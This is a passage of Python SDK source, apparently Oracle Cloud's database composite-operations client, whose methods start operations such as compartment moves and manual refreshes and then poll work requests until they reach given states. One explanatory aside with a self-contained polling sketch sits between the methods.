def add_virtual_machine_to_vm_cluster_and_wait_for_work_request(self, add_virtual_machine_to_vm_cluster_details, vm_cluster_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.add_virtual_machine_to_vm_cluster` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.AddVirtualMachineToVmClusterDetails add_virtual_machine_to_vm_cluster_details: (required)
Request to add Virtual Machines to the VM cluster.
:param str vm_cluster_id: (required)
The VM cluster `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.add_virtual_machine_to_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.add_virtual_machine_to_vm_cluster(add_virtual_machine_to_vm_cluster_details, vm_cluster_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def add_virtual_machine_to_vm_cluster_and_wait_for_state(self, add_virtual_machine_to_vm_cluster_details, vm_cluster_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.add_virtual_machine_to_vm_cluster` and waits for the :py:class:`~oci.database.models.VmCluster` acted upon
to enter the given state(s).
:param oci.database.models.AddVirtualMachineToVmClusterDetails add_virtual_machine_to_vm_cluster_details: (required)
Request to add Virtual Machines to the VM cluster.
:param str vm_cluster_id: (required)
The VM cluster `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.VmCluster.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.add_virtual_machine_to_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.add_virtual_machine_to_vm_cluster(add_virtual_machine_to_vm_cluster_details, vm_cluster_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_vm_cluster(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def autonomous_database_manual_refresh_and_wait_for_work_request(self, autonomous_database_id, autonomous_database_manual_refresh_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.autonomous_database_manual_refresh` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.AutonomousDatabaseManualRefreshDetails autonomous_database_manual_refresh_details: (required)
Request details for manually refreshing an Autonomous Database refreshable clone.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.autonomous_database_manual_refresh`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.autonomous_database_manual_refresh(autonomous_database_id, autonomous_database_manual_refresh_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def autonomous_database_manual_refresh_and_wait_for_state(self, autonomous_database_id, autonomous_database_manual_refresh_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.autonomous_database_manual_refresh` and waits for the :py:class:`~oci.database.models.AutonomousDatabase` acted upon
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.AutonomousDatabaseManualRefreshDetails autonomous_database_manual_refresh_details: (required)
Request details for manually refreshing an Autonomous Database refreshable clone.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.autonomous_database_manual_refresh`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.autonomous_database_manual_refresh(autonomous_database_id, autonomous_database_manual_refresh_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def change_autonomous_container_database_compartment_and_wait_for_work_request(self, change_compartment_details, autonomous_container_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.change_autonomous_container_database_compartment` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.ChangeCompartmentDetails change_compartment_details: (required)
Request to move Autonomous Container Database to a different compartment
:param str autonomous_container_database_id: (required)
The Autonomous Container Database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.change_autonomous_container_database_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_autonomous_container_database_compartment(change_compartment_details, autonomous_container_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
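All of the composite methods in this class follow the same pattern: invoke the underlying operation, read the ``opc-work-request-id`` response header, then poll the work request until its status enters one of the requested states. The sketch below illustrates that polling loop in isolation, using hypothetical stand-in classes (``FakeWorkRequestClient`` and friends are not part of the OCI SDK) so it runs without network access; the real implementation delegates the retry/backoff logic to ``oci.wait_until`` rather than looping directly.

```python
class FakeResponse:
    """Minimal stand-in for an OCI response object with a .data attribute."""
    def __init__(self, data):
        self.data = data


class FakeWorkRequest:
    """Minimal stand-in for oci.work_requests.models.WorkRequest."""
    def __init__(self, status):
        self.status = status


class FakeWorkRequestClient:
    """Reports IN_PROGRESS on the first poll and SUCCEEDED afterwards,
    mimicking an asynchronous work request that eventually terminates."""
    def __init__(self):
        self.calls = 0

    def get_work_request(self, work_request_id):
        self.calls += 1
        status = 'SUCCEEDED' if self.calls >= 2 else 'IN_PROGRESS'
        return FakeResponse(FakeWorkRequest(status))


def wait_for_work_request(client, work_request_id, work_request_states):
    # Status comparison is case-insensitive, as in the composite methods above.
    lowered = [s.lower() for s in work_request_states]
    while True:
        response = client.get_work_request(work_request_id)
        # Same predicate as the evaluate_response lambda: status must be
        # truthy and (lowered) must contain it.
        if response.data.status and response.data.status.lower() in lowered:
            return response
        # The real waiter sleeps between polls (max_interval_seconds) and
        # enforces an overall deadline (max_wait_seconds); omitted here.


client = FakeWorkRequestClient()
result = wait_for_work_request(
    client,
    'ocid1.workrequest.example',  # hypothetical placeholder OCID
    ['SUCCEEDED', 'FAILED', 'CANCELED'],  # default termination states
)
print(result.data.status)  # prints SUCCEEDED after two polls
```

If the wait fails partway through, the composite methods wrap the exception in ``oci.exceptions.CompositeOperationError`` with ``partial_results`` holding the original operation result, so callers can still recover the work request ID from a partially completed operation.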
def change_autonomous_database_compartment_and_wait_for_work_request(self, change_compartment_details, autonomous_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.change_autonomous_database_compartment` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.ChangeCompartmentDetails change_compartment_details: (required)
Request to move Autonomous Database to a different compartment
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.change_autonomous_database_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_autonomous_database_compartment(change_compartment_details, autonomous_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def change_autonomous_exadata_infrastructure_compartment_and_wait_for_work_request(self, change_compartment_details, autonomous_exadata_infrastructure_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.change_autonomous_exadata_infrastructure_compartment` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.ChangeCompartmentDetails change_compartment_details: (required)
Request to move an Autonomous Exadata Infrastructure resource to a different compartment.
:param str autonomous_exadata_infrastructure_id: (required)
The Autonomous Exadata Infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.change_autonomous_exadata_infrastructure_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_autonomous_exadata_infrastructure_compartment(change_compartment_details, autonomous_exadata_infrastructure_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def change_autonomous_vm_cluster_compartment_and_wait_for_work_request(self, change_autonomous_vm_cluster_compartment_details, autonomous_vm_cluster_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.change_autonomous_vm_cluster_compartment` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.ChangeAutonomousVmClusterCompartmentDetails change_autonomous_vm_cluster_compartment_details: (required)
Request to move Autonomous VM cluster to a different compartment
:param str autonomous_vm_cluster_id: (required)
The autonomous VM cluster `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.change_autonomous_vm_cluster_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_autonomous_vm_cluster_compartment(change_autonomous_vm_cluster_compartment_details, autonomous_vm_cluster_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def change_backup_destination_compartment_and_wait_for_work_request(self, change_compartment_details, backup_destination_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.change_backup_destination_compartment` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.ChangeCompartmentDetails change_compartment_details: (required)
Request to move backup destination to a different compartment.
:param str backup_destination_id: (required)
The `OCID`__ of the backup destination.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.change_backup_destination_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_backup_destination_compartment(change_compartment_details, backup_destination_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def change_cloud_exadata_infrastructure_compartment_and_wait_for_work_request(self, change_cloud_exadata_infrastructure_compartment_details, cloud_exadata_infrastructure_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.change_cloud_exadata_infrastructure_compartment` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.ChangeCloudExadataInfrastructureCompartmentDetails change_cloud_exadata_infrastructure_compartment_details: (required)
Request to move cloud Exadata infrastructure resource to a different compartment.
:param str cloud_exadata_infrastructure_id: (required)
The cloud Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.change_cloud_exadata_infrastructure_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_cloud_exadata_infrastructure_compartment(change_cloud_exadata_infrastructure_compartment_details, cloud_exadata_infrastructure_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def change_cloud_vm_cluster_compartment_and_wait_for_work_request(self, change_cloud_vm_cluster_compartment_details, cloud_vm_cluster_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.change_cloud_vm_cluster_compartment` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.ChangeCloudVmClusterCompartmentDetails change_cloud_vm_cluster_compartment_details: (required)
Request to move cloud VM cluster to a different compartment
:param str cloud_vm_cluster_id: (required)
The cloud VM cluster `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.change_cloud_vm_cluster_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_cloud_vm_cluster_compartment(change_cloud_vm_cluster_compartment_details, cloud_vm_cluster_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def change_database_software_image_compartment_and_wait_for_work_request(self, change_compartment_details, database_software_image_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.change_database_software_image_compartment` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.ChangeCompartmentDetails change_compartment_details: (required)
Request to move Database Software Image to a different compartment
:param str database_software_image_id: (required)
The database software image `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.change_database_software_image_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_database_software_image_compartment(change_compartment_details, database_software_image_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def change_db_system_compartment_and_wait_for_work_request(self, change_compartment_details, db_system_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.change_db_system_compartment` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.ChangeCompartmentDetails change_compartment_details: (required)
Request to move the DB system to a different compartment.
**Note:** Deprecated for Exadata Cloud Service systems. Use the `new resource model APIs`__ instead.
For Exadata Cloud Service instances, support for this API will end on May 15th, 2021. See `Switching an Exadata DB System to the New Resource Model and APIs`__ for details on converting existing Exadata DB systems to the new resource model.
__ https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/exaflexsystem.htm#exaflexsystem_topic-resource_model
__ https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/exaflexsystem_topic-resource_model_conversion.htm
:param str db_system_id: (required)
The DB system `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.change_db_system_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_db_system_compartment(change_compartment_details, db_system_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def change_exadata_infrastructure_compartment_and_wait_for_work_request(self, change_exadata_infrastructure_compartment_details, exadata_infrastructure_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.change_exadata_infrastructure_compartment` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.ChangeExadataInfrastructureCompartmentDetails change_exadata_infrastructure_compartment_details: (required)
Request to move Exadata infrastructure to a different compartment
:param str exadata_infrastructure_id: (required)
The Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.change_exadata_infrastructure_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_exadata_infrastructure_compartment(change_exadata_infrastructure_compartment_details, exadata_infrastructure_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def change_external_container_database_compartment_and_wait_for_work_request(self, change_compartment_details, external_container_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.change_external_container_database_compartment` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.ChangeCompartmentDetails change_compartment_details: (required)
Request to move the external container database to a different compartment.
:param str external_container_database_id: (required)
The ExternalContainerDatabase `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.change_external_container_database_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_external_container_database_compartment(change_compartment_details, external_container_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def change_external_non_container_database_compartment_and_wait_for_work_request(self, change_compartment_details, external_non_container_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.change_external_non_container_database_compartment` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.ChangeCompartmentDetails change_compartment_details: (required)
Request to move the external non-container database to a different compartment.
:param str external_non_container_database_id: (required)
The external non-container database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.change_external_non_container_database_compartment`
:param dict waiter_kwargs:
